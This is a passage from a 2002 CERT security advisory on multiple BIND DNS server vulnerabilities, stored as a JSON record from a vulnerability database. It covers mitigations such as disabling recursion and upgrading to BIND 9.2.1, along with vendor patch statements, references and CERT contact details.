libraries.\r\n\r\n Workarounds\r\n\r\n VU#852283 - Cached malformed SIG record buffer overflow\r\n\r\n VU#229595 - Overly large OPT record assertion\r\n\r\n VU#581682 - ISC BIND 8 fails to properly dereference cache SIG RR\r\n elements with invalid expiry times from the internal database\r\n\r\n One potential workaround to limit exposure to the vulnerabilities in\r\n named is to disable recursion on any nameserver responding to DNS\r\n requests made by untrusted systems. 
As mentioned in "Securing an\r\n Internet Name Server":\r\n\r\n Disabling recursion puts your name servers into a passive mode,\r\n telling them never to send queries on behalf of other name servers\r\n or resolvers. A totally non-recursive name server is protected from\r\n cache poisoning, since it will only answer queries directed to it.\r\n It doesn't send queries, and hence doesn't cache any data.\r\n Disabling recursion can also prevent attackers from bouncing denial\r\n of service attacks off your name server by querying for external\r\n zones.\r\n\r\n Non-recursive nameservers should be much more resistant to\r\n exploitation of the server vulnerabilities listed above.\r\n\r\n Additional Countermeasures\r\n\r\n ISC recommends upgrading to BIND version 9.2.1. BIND version 9.2.1 is\r\n available from: http://www.isc.org/products/BIND/bind9.html.\r\n\r\n Note that the upgrade from previous versions of BIND may require\r\n additional site reconfiguration.\r\n\r\nAppendix A. - Vendor Information\r\n\r\n This appendix contains information provided by vendors for this\r\n advisory. As vendors report new information to the CERT/CC, we will\r\n update this section and note the changes in our revision history. If a\r\n particular vendor is not listed below, we have not received their\r\n comments.\r\n\r\n Conectiva\r\n\r\n Conectiva Linux 6.0 is affected by this. 
Updated packages are\r\n available at our ftp server:\r\n\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-chroot-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-static-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-doc-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-utils-8.2.6-1U60_2cl.i386.rpm\r\n\r\n An advisory about this vulnerability is pending and should be sent to\r\n our security mailing list and published in our web site during the day\r\n (Nov 14th).\r\n\r\n FreeBSD\r\n\r\n Please see FreeBSD-SA-02:43.bind.\r\n\r\n Hewlett-Packard Company\r\n\r\n SOURCE: Hewlett-Packard Company Software Security Response team x-ref:\r\n SSRT2408\r\n\r\n At the time of writing this document, Hewlett Packard is currently\r\n investigating the potential impact to HP's released Operating System\r\n software products. As further information becomes available HP will\r\n provide notice of the availability of any necessary patches through\r\n standard security bulletin announcements and be available from your\r\n normal HP Services support channel.\r\n\r\n MontaVista Software\r\n\r\n MontaVista ships BIND 9, thus is not vulnerable to these advisories.\r\n\r\n Nominum, Inc.\r\n\r\n Nominum "Foundation" Authoritative Name Server (ANS) is not affected\r\n by this vulnerability. Also, Nominum "Foundation" Caching Name Server\r\n (CNS) is not affected by this vulnerability. 
Nominum's commercial DNS\r\n server products, which are part of Nominum "Foundation" IP Address\r\n Suite, are not based on BIND and do not contain any BIND code, and so\r\n are not affected by vulnerabilities discovered in any version of BIND.\r\n\r\n Openwall Project\r\n\r\n BIND 4.9.10-OW2 includes the patch provided by ISC and thus has the\r\n two vulnerabilities affecting BIND 4 fixed. Previous versions of BIND\r\n 4.9.x-OW patches, if used properly, significantly reduced the impact\r\n of the "named" vulnerability. The patches are available at their usual\r\n location:\r\n\r\n http://www.openwall.com/bind/\r\n\r\n A patch against BIND 4.9.11 will appear as soon as this version is\r\n officially released, although it will likely be effectively the same\r\n as the currently available 4.9.10-OW2. It hasn't been fully researched\r\n whether the resolver code in glibc, and in particular on Openwall\r\n GNU/*/Linux, shares any of the newly discovered BIND 4 resolver\r\n library vulnerabilities. Analysis is in progress.\r\n\r\n Red Hat Inc.\r\n\r\n Older releases (6.2, 7.0) of Red Hat Linux shipped with versions of\r\n BIND which may be vulnerable to these issues; however, a Red Hat\r\n security advisory in July 2002 upgraded all our supported\r\n distributions to BIND 9.2.1 which is not vulnerable to these issues.\r\n\r\n All users who have BIND installed should ensure that they are running\r\n these updated versions of BIND.\r\n\r\n http://rhn.redhat.com/errata/RHSA-2002-133.html Red Hat Linux\r\n http://rhn.redhat.com/errata/RHSA-2002-119.html Advanced Server 2.1\r\n\r\nAppendix B. - References\r\n\r\n 1. "Securing an Internet Name Server" -\r\n http://www.cert.org/archive/pdf/dns.pdf\r\n 2. 
"Internet Security Systems Security Advisory - Multiple Remote\r\n Vulnerabilities in BIND4 and BIND8" -\r\n http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=\r\n 21469\r\n 3. "BIND Vulnerabilities" -\r\n http://www.isc.org/products/BIND/bind-security.html\r\n 4. "RFC2671 - Extension Mechanisms for DNS (EDNS0)" -\r\n ftp://ftp.isi.edu/in-notes/rfc2671.txt\r\n _________________________________________________________________\r\n\r\n Internet Security Systems publicly reported the following issues\r\n VU#852283, VU#229595, and VU#581682.\r\n\r\n We thank ISC for their cooperation.\r\n _________________________________________________________________\r\n\r\n Author: Ian A. Finlay.\r\n ______________________________________________________________________\r\n\r\n This document is available from:\r\n http://www.cert.org/advisories/CA-2002-31.html\r\n ______________________________________________________________________\r\n\r\nCERT/CC Contact Information\r\n\r\n Email: cert@cert.org\r\n Phone: +1 412-268-7090 (24-hour hotline)\r\n Fax: +1 412-268-6989\r\n Postal address:\r\n CERT Coordination Center\r\n Software Engineering Institute\r\n Carnegie Mellon University\r\n Pittsburgh PA 15213-3890\r\n U.S.A.\r\n\r\n CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) /\r\n EDT(GMT-4) Monday through Friday; they are on call for emergencies\r\n during other hours, on U.S. holidays, and on weekends.\r\n\r\n Using encryption\r\n\r\n We strongly urge you to encrypt sensitive information sent by email.\r\n Our public PGP key is available from\r\n http://www.cert.org/CERT_PGP.key\r\n\r\n If you prefer to use DES, please call the CERT hotline for more\r\n information.\r\n\r\n Getting security information\r\n\r\n CERT publications and other security information are available from\r\n our web site\r\n http://www.cert.org/\r\n\r\n To subscribe to the CERT mailing list for advisories and bulletins,\r\n send email to majordomo@cert.org. 
Please include in the body of your\r\n message\r\n\r\n subscribe cert-advisory\r\n\r\n * "CERT" and "CERT Coordination Center" are registered in the U.S.\r\n Patent and Trademark Office.\r\n ______________________________________________________________________\r\n\r\n NO WARRANTY\r\n Any material furnished by Carnegie Mellon University and the Software\r\n Engineering Institute is furnished on an "as is" basis. Carnegie\r\n Mellon University makes no warranties of any kind, either expressed or\r\n implied as to any matter including, but not limited to, warranty of\r\n fitness for a particular purpose or merchantability, exclusivity or\r\n results obtained from use of the material. Carnegie Mellon University\r\n does not make any warranty of any kind with respect to freedom from\r\n patent, trademark, or copyright infringement.\r\n _________________________________________________________________\r\n\r\n Conditions for use, disclaimers, and sponsorship information\r\n\r\n Copyright 2002 Carnegie Mellon University.\r\n\r\n Revision History\r\n\r\nNovember 14, 2002: Initial release", "edition": 1, "modified": "2002-11-14T00:00:00", "published": "2002-11-14T00:00:00", "id": "SECURITYVULNS:DOC:3754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3754", "title": "CERT Advisory CA-2002-31 Multiple Vulnerabilities in BIND", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}